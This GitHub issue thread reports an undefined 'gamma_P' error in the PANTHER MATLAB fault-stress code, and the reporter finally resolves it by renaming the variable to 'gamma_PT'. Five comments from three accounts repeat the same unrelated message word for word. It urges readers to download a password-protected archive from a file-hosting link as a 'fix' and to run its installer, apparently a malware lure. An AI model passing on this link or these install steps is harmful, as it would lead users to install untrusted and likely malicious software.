### ISSUE TITLE
bug in mutlifault calculator when running with heterogeneous elastic parameters: 'gamma_P' missing

### ISSUE THREAD

**Issue by VvanderHeiden** [TNO/PANTHER#53]
When providing PANTHER depth dependent elastic parameters (young and poisson), I am getting the following error:

> Error using FaultStressChange/get_stress_change_nonuniform (line 126)
An UndefinedFunction error was thrown on the workers for 'gamma_P'.  This might be because the file containing
'gamma_P' is not accessible on the workers. Use addAttachedFiles(pool, files) to specify the required files to
be attached.  For more information, see the documentation for 'parallel.Pool/addAttachedFiles'.

>Error in FaultStressChange/calc_stress_changes_dP (line 70)
                dsigma = self.get_stress_change_nonuniform( GF, y, size(pressure.dp_fault, 2), pressure, gamma_P, 'P');

>Error in FaultStressChange/calc_stress_changes (line 48)
              dsigma_P = self.calc_stress_changes_dP(params, y, pressure, GF, vary_PT, vary_dip );

>Error in panther (line 79)
    parfor (i = 1 : n_members, matlab_workers)

>Error in MultiFaultCalculator/run (line 38)
            parfor i = 1 : n

>Error in run_panther_depth_dependent_wirdum (line 108)
wirdum_stress = wirdum_stress.run;

>Caused by:
    Error using FaultStressChange/get_stress_change_nonuniform (line 126)
    Unrecognized function or variable 'gamma_P'.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by VvanderHeiden** [comment]
Changing 'gamma_P' to 'gamma_PT' in FaultStressChange/get_stress_change_nonuniform (line 126) resolves the bug.
